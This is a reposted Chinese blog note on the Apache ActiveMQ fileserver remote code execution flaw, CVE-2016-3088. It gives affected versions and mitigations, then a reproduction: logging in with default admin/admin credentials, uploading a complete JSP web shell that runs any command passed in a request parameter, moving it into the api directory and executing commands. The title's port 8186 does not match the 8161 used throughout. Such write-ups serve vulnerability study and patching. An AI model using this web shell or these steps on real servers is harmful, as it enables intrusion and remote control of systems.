Apache ActiveMQ 远程代码执行漏洞记录(CVE-2016-3088,端口:8186)
生活随笔
收集整理的這篇文章主要介紹了
Apache ActiveMQ 远程代码执行漏洞记录(CVE-2016-3088,端口:8186)
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
漏洞描述
2016年4月14日,國外安全研究人員 Simon Zuckerbraun 曝光 Apache ActiveMQ Fileserver 存在多個安全漏洞,可使遠程攻擊者用惡意代碼替代Web應用,在受影響系統上執行遠程代碼(CVE-2016-3088)。
漏洞影響版本
Apache ActiveMQ 5.x ~ 5.14.0。
漏洞防護方案
1、ActiveMQ Fileserver 的功能在 5.14.0 及其以后的版本中已被移除。建議用戶升級至 5.14.0 及其以后版本。
2、通過移除?conf\jetty.xml?的以下配置來禁用 ActiveMQ Fileserver 功能。
漏洞復現
直接寫?shell
寫 shell 的話,需要寫在 admin 或者 api 中,也就是需要登錄,沒有密碼的話完成不了寫 shell 操作。
該環境默認的口令為 admin/admin。
訪問?http://ip:8161/admin/test/systemProperties.jsp
獲得當前系統的路徑
上傳 jsp 小馬 2.txt,返回204,但是在 fileserver 路徑下不解析
<%@ page import="java.io.*" %> <% try { String cmd = request.getParameter("cmd"); Process child = Runtime.getRuntime().exec(cmd); InputStream in = child.getInputStream(); int c; while ((c = in.read()) != -1) { out.print((char)c); } in.close(); try { child.waitFor(); } catch (InterruptedException e) { e.printStackTrace(); } } catch (IOException e) { System.err.println(e); } %>然后移動到 api 目錄下,成功的話,返回 204 No Content
執行命令
http://192.168.8.24:8161/api/9.jsp?cmd=ls
總結
以上是生活随笔為你收集整理的Apache ActiveMQ 远程代码执行漏洞记录(CVE-2016-3088,端口:8186)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: Django中的模型继承
- 下一篇: 剑指Offer--二进制中1的个数